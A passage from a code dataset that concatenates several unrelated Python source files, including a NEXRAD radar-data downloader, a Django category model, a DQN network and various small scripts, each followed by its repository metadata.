the Iowa mesonet nor or noq archive:\n https://mesonet.agron.iastate.edu/docs/nexrad_mosaic/\n\n Parameters\n ----------\n start: datetime_like\n Start date string that can be converted to Timestamp with pd.to_datetime\n\n end: datetime_like\n End date string that can be converted to Timestamp with pd.to_datetime\n\n process_data: bool\n Switch to process nexrad data into average reflectivity or not.\n Set to False to get all image array data with rgba values of each radar mosaic pixcel.\n Set to True to map the rgba array to reflectivity mesurements and average the results to\n a single value per time step.\n\n aSync: bool\n Switch to pull data asynchronously (can be much faster for longer data pulls), defaults to False.\n\n progress: bool\n Switch to show tqdm bar for data download progress, defaults to True.\n\n **kwargs: dict\n Keyword arguments to pass onto _async_request_dataframe or _sync_request_dataframe.\n\n\n Returns\n -------\n pd.DataFrame\n DataFrame of precipitation records.\n\n \"\"\"\n\n return super().request_dataframe(\n start, end, process_data, aSync, progress, **kwargs\n )\n\n def _request_url(self, start: datetime_like, *args) -> str:\n \"\"\"Get a formatted nexrad request URL for the IOWA mesonet source.\n\n Parameters\n ----------\n start: datetime_like\n date string that can be converted to Timestamp with pd.to_datetime\n\n Returns\n -------\n str\n NEXRAD request url\n\n Raises\n ------\n Exception\n If start date is prior to 1995, no data before then.\n\n \"\"\"\n dt = pd.to_datetime(start) # .tz_localize(self.TZ)\n if dt < pd.Timestamp(\"1/1/1995\"):\n raise Exception(\"No NEXRAD data prior to 1/1/1995\")\n\n UTC = dt - pd.Timedelta(self.gmt_offset, unit=\"H\")\n\n if UTC < pd.Timestamp(\"2011-03-01\"):\n product = \"n0r\"\n else:\n product = \"n0q\"\n\n url = f\"https://mesonet.agron.iastate.edu/cgi-bin/wms/nexrad/{product}-t.cgi?&REQUEST=GetMap&TRANSPARENT=true&FORMAT=image/png&BGCOLOR=0x000000&VERSION=1.1.1&LAYERS=nexrad-{product}-wmst&STYLES=default&CRS=EPSG:4326&SRS=EPSG:4326&TIME={UTC.isoformat()}&BBOX={self.bbox_str}&WIDTH={self.resolution}&HEIGHT={self.resolution}\"\n\n return url\n\n def _sync_request_dataframe(\n self,\n start: datetime_like,\n end: datetime_like,\n process_data: bool = True,\n pull_freq: str = \"5T\",\n ) -> Union[pd.DataFrame, np.ndarray]:\n \"\"\"Request nexrad data DataFrame with synchronous requests to Iowa Mesonet.\n For potential faster data pulls for longer time periods, use the\n asynchronous request method `_async_request_dataframe`.\n\n Parameters\n ----------\n start: datetime_like\n Start date string that can be converted to Timestamp with pd.to_datetime.\n\n end: datetime_like\n End date string that can be converted to Timestamp with pd.to_datetime.\n\n process_data: bool\n Switch to process nexrad data into average reflectivity or not.\n Set to False to get all image array data with rgba values of each radar mosaic pixcel.\n Set to True to map the rgba array to reflectivity mesurements and average the results to\n a single value per time step.\n\n pull_freq: str\n Pandas offset string for the length of time for each async data request,\n defaults to every 5-min (the frequency of the mesonet datasource).\n\n Returns\n -------\n pd.DataFrame\n DataFrame of nexrad reflectivity records.\n\n \"\"\"\n data = np.array(self._sync_request_data_series(start, end, pull_freq))\n index = pd.date_range(start, end, freq=pull_freq)\n\n if process_data:\n self._update_progress_description(\"Processing\")\n data = pd.DataFrame(\n self._process_data(data, index), index=index, columns=[\"dbz\"]\n )\n\n self._close_progress()\n\n return data\n\n def _sync_request_data( # type: ignore[override]\n self, start: datetime_like, session: requests.Session, **kwargs\n ) -> np.ndarray:\n \"\"\"Synchronously request nexrad data from Iowa Mesonet\n\n Parameters\n ----------\n start: datetime_like\n Datetime string that can be converted to Timestamp with pd.to_datetime.\n\n session: requests.Session\n requests Session to use for API calls.\n\n Returns\n -------\n list\n return: return array of rgba values for each pixel in the nexrad image\n\n \"\"\"\n url = self._request_url(start)\n try:\n with session.get(url) as response:\n b = BytesIO(response.content)\n img = Image.open(b)\n arr = np.array(img.getdata())\n except UnidentifiedImageError as e:\n print(f'error pulling data for {start.isoformat()}. Filling with nan')\n arr = np.full((self.resolution**2,4),np.nan)\n return arr\n\n # async functions\n async def _async_request_dataframe(\n self,\n start: datetime_like,\n end: datetime_like,\n process_data: bool = True,\n pull_freq: str = \"5T\",\n conn_limit: int = 30,\n retry_options: RetryOptionsBase = ExponentialRetry(attempts=5, start_timeout=0.1)\n ) -> Union[pd.DataFrame, np.ndarray]:\n \"\"\"\n Request nexrad data DataFrame with asynchronous requests to Iowa Mesonet.\n\n\n Request precipitation DataFrame with asynchronous annual requests to Iowa Mesonet\n\n This is an async function and must be awaited as::\n\n df = await gage._async_request_dataframe(start = '1/1/2020', end = '1/1/2021')\n\n Parameters\n ----------\n start: datetime_like\n Start date string that can be converted to Timestamp with pd.to_datetime\n\n end: datetime_like\n End date string that can be converted to Timestamp with pd.to_datetime\n\n process_data: bool\n Switch to process nexrad data into average reflectivity or not.\n Set to False to get all image array data with rgba values of each radar mosaic pixcel.\n Set to True to map the rgba array to reflectivity mesurements and average the results to\n a single value per time step.\n\n pull_freq: str\n Pandas offset string for the length of time for each async data request,\n defaults to every 5-min (the frequency of the mesonet datasource).\n\n conn_limit: int\n Connection limit for aiohttp session, defaults to 30\n\n retry_options: RetryOptionsBase\n Retry options to pass to aiohttp_retry client\n\n Returns\n -------\n pd.DataFrame\n DataFrame of nexrad reflectivity records.\n\n \"\"\"\n\n reqEnd = pd.to_datetime(end) + pd.Timedelta(pull_freq)\n data = np.array(\n await self._async_request_data_series(start, reqEnd, pull_freq, conn_limit, retry_options)\n )\n index = pd.date_range(start, end, freq=pull_freq)\n if process_data:\n self._update_progress_description(\"Processing\")\n data = pd.DataFrame(\n self._process_data(data, index), index=index, columns=[\"dbz\"]\n )\n\n self._close_progress()\n\n return data\n\n async def _async_request_data( # type: ignore[override]\n self,\n start: datetime_like,\n session: RetryClient,\n **kwargs,\n ) -> np.ndarray:\n \"\"\"\n Asynchronously request nexrad data from Iowa Mesonet\n\n\n Parameters\n ----------\n start: datetime_like\n Datetime string that can be converted to Timestamp with pd.to_datetime.\n\n session: aiohttp_retry.RetryClient\n aiohttp_retry RetryClient to use for API calls.\n\n Returns\n -------\n np.ndarray\n Array of rgba values for each pixel in the nexrad image\n \"\"\"\n # start, dummy, session = args\n url = self._request_url(start)\n # async json response\n # https://docs.aiohttp.org/en/stable/client_quickstart.html#json-response-content\n error_counter = 0\n for i in range(5):\n try:\n async with session.get(url) as response:\n b = BytesIO(await response.read())\n img = Image.open(b)\n arr = np.array(img.getdata())\n\n except aiohttp.ClientConnectionError:\n # print(\n # \"Oops, the connection was dropped before we finished, retrying...\"\n # )\n error_counter += 1\n continue\n except UnidentifiedImageError as e:\n print(f'error pulling data for {start.isoformat()}. Filling with nan')\n arr = np.full((self.resolution**2,4),np.nan)\n except Exception as e:\n print(e)\n print(f\"error pulling {url}, retrying...\")\n error_counter += 1\n continue\n \n return arr\n\n\n raise Exception(f\"error pulling {url} after 5 retries\")\n\n def _process_data(self, data: np.ndarray, index: np.ndarray) -> np.ndarray:\n \"\"\"Process raw nexrad rgb values into reflectivity values using NOAA color maps\n and average values for the entire image.\n\n Parameters\n ----------\n data: np.ndarray\n Array of rgb values\n\n index: np.ndarray\n Array of datetimes for each rgb array\n\n\n Returns\n -------\n pd.DataFrame\n pandas DataFrame of filtered hourly data\n\n \"\"\"\n nor = np.where(index < pd.Timestamp(\"2011-03-01\"))[0]\n noq = np.where(index >= pd.Timestamp(\"2011-03-01\"))[0]\n\n norD = NEXRAD._NORtoDBZ(data[nor])\n noqD = NEXRAD._NOQtoDBZ(data[noq])\n\n dbz = np.concatenate([norD, noqD], axis=0)\n\n # zero out negative dbz from n0q\n dbz[np.where(dbz < 0)] = 0\n dbz = np.mean(dbz, axis=1)\n\n return dbz\n","repo_name":"karosc/storms","sub_path":"storms/precip/datasets/_nexrad.py","file_name":"_nexrad.py","file_ext":"py","file_size_in_byte":13509,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"16575898673","text":"import asyncio\nimport aiohttp\nfrom bs4 import BeautifulSoup\n\n\nclass PluralService:\n def __init__(self):\n self.base_url = 'https://tools.dehumanizer.com/'\n self.url = f'{self.base_url}plural/index2.php/'\n self.arg = 'texto'\n self.selector = '#main h3 pre'\n self.words = {}\n\n async def __get_plural_html(self, word: str):\n async with aiohttp.ClientSession(self.base_url) as session:\n async with session.post(self.url, data={self.arg: word}) as response:\n return response.text()\n\n async def __parse_plural(self, word: str) -> str:\n html = await self.__get_plural_html(word)\n soup = BeautifulSoup(html, 'html.parser')\n plural = soup.select_one(self.selector).text\n self.words.update({word: plural})\n \n def get_plural(self, *words: tuple[str]) -> dict[str, str]:\n self.words.clear()\n loop = asyncio.get_event_loop()\n coroutines = [asyncio.create_task(self.__parse_plural(word)) for word in words]\n loop.run_until_complete(asyncio.wait(coroutines))\n return self.words\n","repo_name":"alexnegrya/E-shop","sub_path":"services/grammar.py","file_name":"grammar.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32969909986","text":"class visitor:\n # attribute: variable\n # class var\n title = \"Ericsson visitor\"\n name = \"\"\n phone = \"\"\n \n # cunstructor : function : method\n def __init__(self, name, phone):\n self.name = name\n self.phone = phone\n print(\"this is visitor class ... testing\")\n \n # method: function\n def get_name(self):\n print(\"name is : \" , self.name)\n \n def send_sms(self):\n print(\"send sms to: \", self.phone)\n #print(x)\n\n\n# instantiation\n# jack: object - instance\njack = visitor(\"Jack\", 12345)\n\njack.name\n\njack.send_sms()\n\n\n\n","repo_name":"rasulkarimov/python","sub_path":"python_core_concepts/classes/class.py","file_name":"class.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15611009121","text":"\nimport pandas as pd\nimport numpy as np\n\n\n# Load data\ndata = pd.read_csv('C:\\\\Users\\\\ritth\\\\code\\\\Strive\\\\Strive-Exercises\\\\Chapter 02\\\\15. TimeSeries\\\\climate.csv')\n# print(data.shape)\n\ndata = data.drop(\"Date Time\", axis = 1)\n#print(data.head())\n\n\n# Function to extract sequences and target variable from given data\ndef pairing(data, seq_len = 10):\n\n x = []\n y = []\n for i in range(0, (data.shape[0] - seq_len + 1), seq_len + 1):\n\n seq = np.zeros((seq_len, data.shape[1]))\n\n for j in range(seq_len):\n seq[j] = data.values[i + j]\n \n\n x.append(seq)\n y.append(data['T (degC)'][i + seq_len])\n\n return np.array(x), np.array(y)\n\n\npairing(data.head())\n\n# Extract chunks (sequence) of data and the target variable\nx, y = pairing(data)\n\n\nprint(x.shape)\nprint(y.shape)\n","repo_name":"RitthujaKandasamy/Strive-Exercises","sub_path":"Chapter 02/15. TimeSeries/timeseries.py","file_name":"timeseries.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38968548115","text":"# -*- coding:utf-8 -*-\n\nimport ConfigParser\nfrom tulip import *\nimport math\nimport json\nimport pandas as pd\nimport numpy as np\n\n\nclass View(object):\n \"\"\"docstring for View\"\"\"\n def __init__(self):\n super(View, self).__init__()\t\t\n self.config = ConfigParser.ConfigParser()\n self.config.read('app/webapp.ini')\n self.store_path = self.config.get('view', 'store_path')\n\n def graph2json(self, graph):\n json_object = {}\n label = graph['Libellé de partenaire']\n\n nodes = [] \n for n in graph.getNodes():\n node={ 'id': n.id ,'label': label[n],'group':graph['viewMetric'][n]}\n nodes.append(node)\n \n json_object['nodes'] = nodes\n links = []\n for e in graph.getEdges():\n links.append({'from': graph.source(e).id, 'to': graph.target(e).id})\n json_object['links'] = links\n \n with open('static/universities.json', 'w') as fp:\n json.dump(json_object, fp)\n\n def graph2json2(self,graph,univ):\n json_object = {}\n label = graph['Libellé de partenaire']\n\n nodes = [] \n for n in graph.getNodes(): #on cherche le libelle correspondant à l'id univ.\n if n.id==univ:\n univlab=label[n]\n break\n\n for n in graph.getNodes(): \n if label[n]==univlab or univlab in graph['Partenaires communs'][n] :\n node={ 'id': n.id ,'label': label[n]}\n nodes.append(node)\n \n json_object['nodes'] = nodes\n links = []\n for e in graph.getEdges():\n if univlab in graph['Partenaires'][e] :\n a_ajouter=True\n for a in links:\n if (a['from']==graph.source(e).id and a['to']==graph.target(e).id): #on regarde si une arête entre cette source et cette cible existe déjà, et dans ce cas on ajoute dans ces paramètre le projet et on incrémente de 1 le nombre de projet.\n a['title']=a['title']+', '+graph['Projet'][e][0]\n a['value']=a['value']+1\n a['label']=str(a['value'])+' projets'\n a_ajouter=False #dans ce cas pas besoin d'ajouter une nouvelle arête\n break\n if (a_ajouter==True): #si il n'existe pas encore une arête entre cette source et cette cible, on en créé une\n links.append({'from': graph.source(e).id, 'to': graph.target(e).id,'label' : '1 projet' ,'font': {'align': 'middle'},'value':1,'title': graph['Projet'][e][0] }) \n json_object['links'] = links \n with open('static/university.json', 'w') as fp:\n json.dump(json_object, fp) \n return univlab\n\n\n def ville2json(self,ville):\n data = pd.read_csv(\"static/fr-esr-aap-anr-projets-retenus-participants-identifies.csv\",sep=\";\",encoding ='utf-8') \n year=u'Année de financement'\n part=u'Libellé de partenaire'\n projet=u'Acronyme'\n montant=u'Montant'\n data=data.loc[:,[projet,year,montant,part]] \n data.dropna(inplace=True)\n data = data.reset_index()\n data = data.drop([\"index\"],axis=1)\n l=[]\n for i in range(0,len(data)):\n if ville not in data.loc[i,part]:\n l.append(i) \n data=data.drop(l) #on enlève tous les projets auxquels la ville n'a pas participé\n data=data.reset_index()\n data = data.drop([\"index\"],axis=1)\n df=pd.DataFrame(columns=['Partenaire','Projet','Annee','Montant','id']) \n line=0\n for i in range(0,len(data)):\n part_proj=data.loc[i,part].split(';') #liste de tous les partenaires d'un projet\n a=0\n for x in part_proj:\n if ville in x and x not in part_proj[0:a]: #x not in part_proj[0:a] car certains partenaires apparaissent plusieurs fois pour un même projet.\n df.loc[line,'Partenaire']=x.replace(',', '')\n df.loc[line,'Annee']=data.loc[i,year]\n df.loc[line,'Projet']=data.loc[i,projet]\n df.loc[line,'Montant']=data.loc[i,montant]\n df.loc[line,'id']=line\n line+=1\n a+=1\n df.to_json('static/city.json',orient='records')\n\n def generate_graph(self):\n json_object = {}\n data = pd.read_csv(\"static/fr-esr-aap-anr-projets-retenus-participants-identifies.csv\", sep=\";\")\n data = data.loc[:,[\"Acronyme\",\"Sigle de partenaire\"]]\n data = data.dropna()\n data = data.reset_index()\n data = data.drop([\"index\"],axis=1)\n #data contient tous les projets caractérisés par les colonnes \"acronyme\", et \"sigle de partenaire\"\n #les projets ayant des valeurs manquantes pour l'acronyme ou le sigle de partenaire sont supprimés\n liste = []\n #liste va contenir les partenaires qui partagent des projets avec le labri\n for i in range(0,len(data)):\n if 'LaBRI' in data.loc[i,\"Sigle de partenaire\"]:\n for x in data.loc[i,\"Sigle de partenaire\"].split(\";\"):\n if x !='':\n liste.append(x)\n\n liste_ = list(set(liste)) #on ne garde qu'une occurence de chaque partenaire\n node=[]\n #node contient l'ensemble des partenaires qui seront des noeuds sur notre graphe\n for j in range(0,len(liste_)):\n if liste_[j]==\"LaBRI\":\n node.append({'id':liste_[j], 'label':liste_[j], 'group':0}) #la couleur des noeuds sera différente selon le groupe\n else :\n node.append({'id':liste_[j], 'label':liste_[j], 'group':liste.count(liste_[j])}) #le groupe représente le nombre de projet partagé(s) avec le labri\n\n json_object['nodes'] = node\n link=[]\n #link represente les arrêtes de notre graphe, value représente la largeur de l'arête qui sera plus epaisse selon le nombre de projets partagés avec le labri\n for j in range(0,len(liste_)):\n if liste_[j]!=\"LaBRI\": \n link.append({'from':\"LaBRI\",'to':liste_[j] , 'value':node[j][\"group\"]*6})\n\n json_object['links'] = link \n with open('static/labri.json', 'w') as fp:\n json.dump(json_object, fp)\n\n def projet(self,sigle):\n data = pd.read_csv(\"static/fr-esr-aap-anr-projets-retenus-participants-identifies.csv\", sep=\";\",encoding='utf-8')\n data = data.loc[:,[\"Acronyme\",u'Année de financement',\"Montant\",\"Sigle de partenaire\"]]\n data = data.dropna(subset=['Acronyme','Sigle de partenaire'])\n data = data.reset_index()\n data = data.drop([\"index\"],axis=1)\n data=data.fillna(0)\n #Data contient tous les projets caractérisés par les colonnes \"acronyme\", \"année de financement\",\"montant\" et \"sigle de partenaire\"\n #Les projets ayant des valeurs manquantes pour l'acronyme ou le sigle de partenaire sont supprimés (car dans la selection pour faire le graphe précédent (generate.graph()) nous ne prenons que\n #ces deux colonnes, si nous supprimons aussi les lignes ayant des valeurs manquantes pour année de financement et montant alors des projets comptés précédemment seront supprimés\n #et il y aura moins de projets affichés que de projets prévus (par la couleur par exemple sur le graphe du labri)\n #Donc les valeurs manquantes pour l'année de financement ou le montant sont remplacées par des 0\n \n liste = []\n #liste va contenir tous les projets ayant le labri et \"sigle\" (le partenaire sur lequel on a cliqué) dans ses sigles de partenaire.\n for i in range(0,len(data)):\n if sigle in data.loc[i,\"Sigle de partenaire\"] and 'LaBRI' in data.loc[i,\"Sigle de partenaire\"] :\n liste.append(i)\n \n\n proj = pd.DataFrame(index = range(0,len(liste)), columns = [\"Acronyme\",\"Annee\",\"Montant\",\"Partenaire\" ])\n #proj contient les projets commun entre le labri et le partenaire voulu caractérisés par l'acronyme, l'année de financement, le montant et les autres partenaires\n for j in range(0,len(liste)):\n proj.loc[j, \"Acronyme\"] = data.loc[liste[j],u\"Acronyme\"]\n proj.loc[j,\"Partenaire\"] = data.loc[liste[j],\"Sigle de partenaire\"]\n proj.loc[j, \"Annee\"] = data.loc[liste[j],u\"Année de financement\"]\n proj.loc[j,\"Montant\"] = data.loc[liste[j],\"Montant\"]\n \n\n proj.to_csv('static/projects_part_labri.csv', sep=\",\", encoding='utf-8', index=False)\n\n \n\n \n","repo_name":"estellepreuilh/projet_ANR","sub_path":"ANR/view/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":10398,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"10085563687","text":"import torch\nimport numpy as np\nimport horovod.torch as hvd\n\n\nclass Meter(object):\n def __init__(self, pp_pr, pp_gt):\n self.n_tracked = None\n self.loss = None\n self.avg_loss = None\n # main metric is Top1 error\n self.topk = (1, 5)\n self.correct = None\n self.avg_error = None\n self.avg_metric = None\n self.start_metric = torch.tensor(100.)\n\n self.pp_pr = pp_pr\n self.pp_gt = pp_gt\n self.reset()\n\n def reset(self):\n self.n_tracked = torch.tensor(0)\n self.loss = torch.tensor(0.)\n self.avg_loss = torch.tensor(0.)\n self.correct = torch.zeros(len(self.topk))\n self.avg_error = self.start_metric.repeat(len(self.topk))\n\n def update(self, pr_outs, gt_labels, loss):\n pr_labels = self.pp_pr(pr_outs)\n gt_labels = self.pp_gt(gt_labels)\n assert len(pr_labels) == len(gt_labels), 'Number of predictions does not match number of ground truths!'\n bs = torch.tensor(len(gt_labels))\n self.n_tracked += hvd.allreduce(bs, name='batch_size', average=False)\n # update loss\n self.loss += hvd.allreduce(loss.item() * bs, name='loss', average=False) # loss should be unlinked from computational graph\n self.avg_loss = self.loss / self.n_tracked\n # update main metric\n correct = torch.zeros(len(self.topk))\n for i in range(bs):\n for j, k in enumerate(self.topk):\n correct[j] += gt_labels[i] in pr_labels[i][0:k]\n self.correct += hvd.allreduce(correct, name='metric', average=False)\n self.avg_error = 100. * (1. - np.true_divide(self.correct, self.n_tracked)) # cast to avoid integer division\n self.avg_metric = self.avg_error[0] # main metric is Top1 error\n\n def is_better(self, current_metric, best_metric):\n # compare Top1 errors\n return current_metric < best_metric\n","repo_name":"sbenslan/sem21f23","sub_path":"problems/ImageNet/meter.py","file_name":"meter.py","file_ext":"py","file_size_in_byte":2008,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"331125944","text":"from django.db import models\nfrom django.utils.translation import gettext_lazy as _\nfrom mptt.models import MPTTModel, TreeForeignKey\n\n\nclass Category(MPTTModel):\n name = models.CharField(max_length=50)\n parent = TreeForeignKey(\n \"self\",\n on_delete=models.PROTECT,\n null=True,\n blank=True,\n\n )\n\n class MPTTMeta:\n verbose_name = _(\"category\")\n verbose_name_plural = _(\"categories\")\n\n def __str__(self):\n return f'{self.name} | parent - {self.parent}' if self.parent else self.name\n\n @classmethod\n def get_default_pk(cls):\n obj, created = cls.objects.get_or_create(name=\"No category\")\n return obj.pk\n\n\nclass Product(models.Model):\n name = models.CharField(max_length=150)\n description = models.CharField(max_length=200)\n category = models.ForeignKey(\n Category,\n on_delete=models.SET_DEFAULT,\n default=Category.get_default_pk,\n\n )\n price = models.DecimalField(max_digits=7, decimal_places=2)\n quantity = models.PositiveSmallIntegerField(default=0)\n\n class Meta:\n verbose_name = _(\"product\")\n verbose_name_plural = _(\"products\")\n\n def __str__(self):\n return f'{self.name} price - ({self.price} quantity - {self.quantity} description - {self.description})'\n\n\n","repo_name":"Dmitry979/chinese-auto-django-mptt","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"44905472441","text":"from cgitb import text\r\nfrom tkinter import *\r\nfrom tkinter import messagebox\r\nfrom turtle import width\r\nimport BT\r\nimport sys\r\n\r\ndef action():\r\n #获取输入框内容\r\n data = entry.get().strip()\r\n output = BT.work(data)\r\n message = messagebox.showinfo(title='翻译结果', message='翻译结果:\\n' + output)\r\n print(message)\r\n\r\ndef exit():\r\n #退出\r\n sys.exit(0)\r\n\r\n#施工中...\r\ndef actWin():\r\n root = Tk()\r\n root.geometry('150x100+800+400')\r\n root.resizable(False,False)\r\n root.title('状态')\r\n Label(root, text = '正在执行中', font = ('黑体',13)).grid(padx=30, pady=70)\r\n root.mainloop()\r\n\r\nif __name__ == '__main__':\r\n \r\n #实例化Tk\r\n root = Tk()\r\n \r\n\r\n #设置位置和大小\r\n root.geometry('500x300+800+400')\r\n\r\n #是否可拉伸窗口\r\n root.resizable(False,False)\r\n\r\n #设置标题\r\n root.title('百度翻译')\r\n\r\n #设置标签,grid --> 设置网格\r\n Label(root, text = '请输入词汇: ', font = ('黑体',13)).grid(padx=30, pady=70)\r\n Label(root, text = ' Created by BinL', font = ('黑体',10)).grid(row=4, column=1,pady=30)\r\n Label(root, text = 'Ver 0.0.1', font = ('黑体',10)).grid(row=2, column=0)\r\n\r\n #输入框\r\n entry = Entry(root, width=40)\r\n entry.grid(row=0,column=1)\r\n\r\n\r\n #按钮1\r\n button1 = Button(root, text = '运行', width=20, command=action)\r\n button1.grid(row=2,column=1)\r\n\r\n\r\n\r\n #循环弹窗\r\n root.mainloop()","repo_name":"BinL233/BaiduTranslator","sub_path":"BaiduTranslator.py","file_name":"BaiduTranslator.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40843305957","text":"from __future__ import print_function\nimport sys\nimport os\nsys.path.append(os.getcwd() + \"/../../\")\n\n# Import Python Modules\nfrom CONVGF.utility import env2pme\nfrom CONVGF.utility import read_convolution_file\nimport numpy as np\n\n#### USER INPUT ####\n\nharmonic=\"M2\"\noutput_directory = (\"./output/\")\nfilename=(output_directory + \"cn_OceanOnly_\" + harmonic + \"_cm_convgf_GOT410c_PREM.txt\")\npme_file=(output_directory + \"pme_OceanOnly_\" + harmonic + \"_cm_convgf_GOT410c_PREM.txt\")\n\n#### BEGIN CODE ####\n\n# Create output directory, if it does not yet exist\nif not (os.path.isdir(output_directory)):\n os.makedirs(output_directory)\n\nsta,lat,lon,eamp,epha,namp,npha,vamp,vpha = read_convolution_file.main(filename)\n\n# Perform the Conversion\nsmmjr,smmnr,theta = env2pme.main(eamp,epha,namp,npha)\n\n# Force Theta Positive\ntheta[theta < 0.] += 360.\n\n# Remove Duplicate Stations\nunique_sta, usta_idx = np.unique(sta,return_index=True)\nsta = sta[usta_idx]; lat = lat[usta_idx]; lon = lon[usta_idx]; eamp = eamp[usta_idx]; epha = epha[usta_idx]\nnamp = namp[usta_idx]; npha = npha[usta_idx]; vamp = vamp[usta_idx]; vpha = vpha[usta_idx]; smmjr = smmjr[usta_idx]\nsmmnr = smmnr[usta_idx]; theta = theta[usta_idx]\n\n# Prepare Output Files\npme_head = (\"../../output/Convolution/pme_head.txt\")\npme_body = (\"../../output/Convolution/pme_body.txt\")\n\n# Prepare Data for Output (as Structured Array)\nall_pme_data = np.array(list(zip(sta,lat,lon,theta,smmjr,smmnr,eamp,epha,namp,npha,vamp,vpha)), dtype=[('sta','U25'), \\\n ('lat',float),('lon',float),('theta',float),('smmjr',float),('smmnr',float),('eamp',float),('epha',float), \\\n ('namp',float),('npha',float),('vamp',float),('vpha',float)])\n\n# Write Header Info to File\nhf = open(pme_head,'w')\npme_str = 'Station Lat(+N,deg) Lon(+E,deg) Direction(deg) Semi-Major(mm) Semi-Minor(mm) E-Amp(mm) E-Pha(deg) N-Amp(mm) N-Pha(deg) V-Amp(mm) V-Pha(deg) \\n'\nhf.write(pme_str)\nhf.close()\n\n# Write PME Results to File\n#f_handle = open(pme_body,'w')\nnp.savetxt(pme_body,all_pme_data,fmt=[\"%s\"]+[\"%.8f\",]*11,delimiter=\" \")\n#f_handle.close()\n\n# Combine Header and Body Files\nfilenames_pme = [pme_head, pme_body]\nwith open(pme_file,'w') as outfile:\n for fname in filenames_pme:\n with open(fname) as infile:\n outfile.write(infile.read())\n \n# Remove Header and Body Files\nos.remove(pme_head)\nos.remove(pme_body)\n\n\n","repo_name":"hrmartens/LoadDef","sub_path":"utility/pmes/run_env2pme.py","file_name":"run_env2pme.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"21"} +{"seq_id":"23110298801","text":"import tensorflow as tf\nimport tensorflow.contrib.slim as slim\n\n\nclass QNetwork(object):\n\n def __init__(self, n_hidden, n_actions, learning_rate=0.0001):\n # The network receives a frame from the game, flattened into an array.\n # It then resizes and processes it through four convolutional layers.\n self.scalar_input = tf.placeholder(shape=[None, 21168], dtype=tf.float32)\n self.image_in = tf.reshape(self.scalar_input, shape=[-1, 84, 84, 3])\n self.conv1 = slim.conv2d(inputs=self.image_in, num_outputs=32,\n kernel_size=[8, 8], stride=[4, 4], padding='VALID',\n biases_initializer=None)\n self.conv2 = slim.conv2d(inputs=self.conv1, num_outputs=64,\n kernel_size=[4, 4], stride=[2, 2], padding='VALID',\n biases_initializer=None)\n self.conv3 = slim.conv2d(inputs=self.conv2, num_outputs=64,\n kernel_size=[3, 3], stride=[1, 1], padding='VALID',\n biases_initializer=None)\n self.conv4 = slim.conv2d(inputs=self.conv3, num_outputs=n_hidden,\n kernel_size=[7, 7], stride=[1, 1], padding='VALID',\n biases_initializer=None)\n\n # take the output from the final convolutional layer and split it into\n # separate advantage and value streams\n self.stream_ac, self.stream_vc = tf.split(self.conv4, 2, 3)\n self.stream_a = slim.flatten(self.stream_ac)\n self.stream_v = slim.flatten(self.stream_vc)\n xavier_init = tf.contrib.layers.xavier_initializer()\n self.aw = tf.Variable(xavier_init([n_hidden // 2, n_actions]))\n self.vw = tf.Variable(xavier_init([n_hidden // 2, 1]))\n self.advantage = tf.matmul(self.stream_a, self.aw)\n self.value = tf.matmul(self.stream_v, self.vw)\n\n # then combine them together to get our final Q-values\n self.q_out = self.value + tf.subtract(self.advantage, tf.reduce_mean(self.advantage, axis=1, keep_dims=True))\n self.predict = tf.argmax(self.q_out, 1)\n\n # obtain the loss by taking the sum of squares difference between\n # the target and predicted Q-values\n self.target_q = tf.placeholder(shape=[None], dtype=tf.float32)\n self.actions = tf.placeholder(shape=[None], dtype=tf.int32)\n self.actions_onehot = tf.one_hot(self.actions, n_actions, dtype=tf.float32)\n\n self.q = tf.reduce_sum(tf.multiply(self.q_out, self.actions_onehot), axis=1)\n\n self.td_error = tf.square(self.target_q - self.q)\n self.loss = tf.reduce_mean(self.td_error)\n self.trainer = tf.train.AdamOptimizer(learning_rate=learning_rate)\n self.update_op = self.trainer.minimize(self.loss)\n","repo_name":"markmo/dltemplate","sub_path":"src/rl/survey_of_methods/dqn/model_setup.py","file_name":"model_setup.py","file_ext":"py","file_size_in_byte":2836,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"21"} +{"seq_id":"29253588908","text":"import csv\n\ncsv_file = []\n\n\n# Открываю csv файл\ndef file_open():\n global csv_file\n with open('new 1.csv', \"r\", newline=\"\", encoding=\"utf-8\") as file:\n reader = csv.DictReader(file, delimiter=';')\n for row in reader:\n print(row)\n csv_file.append(row)\n print('Файл открыт. Записей:', len(csv_file))\n\n\n# Добавление данных\ndef insert(vin, gos, mar, mod, god, mosh, probeg, vladel, zena):\n global csv_file\n try:\n csv_file.append({'VIN-номер': vin, 'Гос_номер:': gos, 'Марка': mar, 'Модель: ': mod,\n 'Год_выпуска: ': god, 'Мощн_дв: ': mosh, 'Пробег: ': probeg, 'Кол_вл: ': vladel,\n 'Цена: ': zena})\n except Exception as e:\n return f'Ошибка при добавленнии новой записи {e}'\n return \"Данные добавлены.\"\n\n\n# Добавление данных\ndef insert(vin, gos, mar, mod, god, mosh, probeg, vladel, zena):\n global csv_file\n try:\n csv_file.append({'VIN-номер': vin, 'Гос_номер:': gos, 'Марка': mar, 'Модель: ': mod, 'Год_выпуска: ': god,\n 'Мощн_дв.: ': mosh, 'Пробег: ': probeg, 'Кол_вл: ': vladel, 'Цена: ': zena})\n except Exception as e:\n return f'Ошибка при добавленнии новой записи {e}'\n return \"Данные добавлены.\"\n\n\n# Удалить по VIN-номеру\ndef drop_by_arg(val, col_name='VIN-номер'):\n global csv_file\n try:\n csv_file = 